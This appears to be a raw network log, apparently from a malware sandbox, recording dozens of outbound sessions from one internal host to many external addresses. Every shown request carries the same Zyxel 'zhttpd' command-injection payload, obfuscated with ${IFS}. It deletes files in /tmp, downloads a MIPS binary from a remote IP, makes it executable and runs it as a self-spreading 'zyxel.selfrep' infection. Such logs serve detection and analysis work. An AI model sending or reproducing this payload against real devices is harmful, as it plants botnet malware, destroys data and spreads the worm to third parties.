                                        Mar 31, 2024 09:21:08.749692917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3806192.168.2.2356658113.229.8.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749758959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3807192.168.2.2358432166.238.112.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749820948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3808192.168.2.2359114159.195.96.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749912024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3809192.168.2.2338454200.253.97.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.749973059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3810192.168.2.234832670.220.191.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750063896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3811192.168.2.2345958183.139.152.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750107050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3812192.168.2.2342556179.116.63.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750190973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3813192.168.2.2355472211.255.160.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750250101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3814192.168.2.2342540121.144.93.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750308990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3815192.168.2.2343586146.27.123.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750401974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3816192.168.2.2346248151.56.124.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750463009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3817192.168.2.236055267.133.130.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750555992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3818192.168.2.2349862139.115.42.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750623941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3819192.168.2.2350278104.56.175.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750688076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3820192.168.2.233968244.183.67.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750770092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3821192.168.2.233452475.230.113.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750844955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3822192.168.2.234157671.166.127.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750895023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3823192.168.2.235609031.240.171.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.750950098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3824192.168.2.2351742193.35.144.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751013994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3825192.168.2.2343604197.92.114.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751084089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3826192.168.2.2356888144.24.102.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751135111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3827192.168.2.2340886151.173.127.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751219034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3828192.168.2.235686282.236.147.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751288891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3829192.168.2.233489296.219.104.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751351118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3830192.168.2.235343012.7.1.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751420021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3831192.168.2.2340996174.105.177.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751486063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3832192.168.2.2354548163.149.186.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751552105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3833192.168.2.233632024.16.32.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751633883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3834192.168.2.2342842170.130.163.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751678944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3835192.168.2.2354614186.137.142.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751760006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3836192.168.2.235619897.149.0.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751810074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3837192.168.2.233451234.50.192.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751873016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3838192.168.2.2355456116.47.184.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.751969099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3839192.168.2.234923881.67.189.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752007961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3840192.168.2.2339982105.237.255.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752084970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3841192.168.2.234923491.29.211.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752149105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3842192.168.2.23385304.187.199.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752207994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3843192.168.2.234905083.40.68.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752268076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3844192.168.2.2339398138.86.46.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752324104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3845192.168.2.2354076108.190.135.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752371073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3846192.168.2.23458428.71.48.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752439022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3847192.168.2.235311238.144.118.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752500057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3848192.168.2.2342866179.195.22.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752583027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3849192.168.2.233300820.88.121.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752643108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3850192.168.2.2350698107.223.146.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752706051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3851192.168.2.2350022142.217.186.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752788067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3852192.168.2.2341444171.89.86.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752851009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3853192.168.2.235595639.197.189.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752916098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3854192.168.2.2359722184.113.193.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.752983093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3855192.168.2.2352170110.121.72.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753047943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3856192.168.2.2350000210.249.184.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753103971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3857192.168.2.2354230136.187.230.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753161907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3858192.168.2.2350890126.109.111.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753230095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3859192.168.2.2357914116.209.50.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753321886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3860192.168.2.2360884145.160.117.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753387928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3861192.168.2.234898246.95.129.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753480911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3862192.168.2.2360918109.66.110.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753536940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3863192.168.2.2341378208.6.135.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753609896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3864192.168.2.2333968220.247.41.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753669024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3865192.168.2.2340726118.126.118.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753751040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3866192.168.2.234502040.45.126.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753806114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3867192.168.2.2346622132.223.220.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753886938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3868192.168.2.2343224148.37.212.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.753957987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3869192.168.2.234074086.111.46.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754009008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3870192.168.2.2335172169.132.164.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754071951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3871192.168.2.235734058.163.247.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754156113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3872192.168.2.2355120174.120.225.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754205942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3873192.168.2.2349542165.116.74.203443
                                        TimestampBytes transferredDirectionData
